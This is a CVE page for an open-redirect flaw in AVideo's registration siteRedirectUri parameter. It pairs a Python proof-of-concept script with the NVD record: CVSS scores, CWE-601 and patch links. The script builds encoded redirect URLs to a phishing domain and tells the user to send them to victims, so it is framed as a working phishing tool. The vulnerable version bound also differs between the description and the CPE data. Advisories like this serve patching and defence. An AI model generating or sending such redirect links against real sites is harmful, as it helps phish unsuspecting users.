CVE-2025-34440

import requests import urllib.parse # CVE-2025-34440 PoC - Open Redirect in AVideo siteRedirectUri parameter # Target: AVideo versions prior to 20.1 # Attack: Redirect users to external malicious site via registration def generate_evil_redirect_url(target_url, evil_domain): """ Generate malicious redirect URL Args: target_url: Target AVideo instance URL evil_domain: Attacker's controlled domain for redirect Returns: Malicious URL with siteRedirectUri parameter """ register_path = "/register" redirect_param = "siteRedirectUri" # Encode the evil URL to bypass basic filters encoded_redirect = urllib.parse.quote(evil_domain, safe='') # Construct the malicious URL malicious_url = f"{target_url.rstrip('/')}{register_path}?{redirect_param}={encoded_redirect}" return malicious_url def verify_open_redirect(target_url, evil_domain): """ Verify if the target is vulnerable to open redirect Args: target_url: Target AVideo instance URL evil_domain: Domain to test redirect Returns: True if vulnerable, False otherwise """ register_path = "/register" redirect_param = "siteRedirectUri" test_url = f"{target_url.rstrip('/')}{register_path}?{redirect_param}={evil_domain}" try: response = requests.get(test_url, allow_redirects=False, timeout=10) # Check if redirect occurs to external domain if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if evil_domain in location or evil_domain in location.replace('http://', '').replace('https://', ''): return True return False except requests.RequestException as e: print(f"Error: {e}") return False if __name__ == "__main__": # Configuration target = "https://target-avideo-site.com" evil = "https://phishing.example.com" # Generate malicious URL malicious_url = generate_evil_redirect_url(target, evil) print(f"Malicious URL: {malicious_url}") print(f"\nSend this URL to victims to redirect them after registration") # Check vulnerability (for authorized testing only) # is_vulnerable = verify_open_redirect(target, evil) # print(f"Vulnerable: {is_vulnerable}")

{"cve": {"id": "CVE-2025-34440", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.557", "lastModified": "2025-12-19T19:15:51.617", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 contain an open redirect vulnerability caused by insufficient validation of the siteRedirectUri parameter during user registration. Attackers can redirect users to external sites, facilitating phishing attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/77c70019b0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-open-redirect-via-siteredirecturi-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}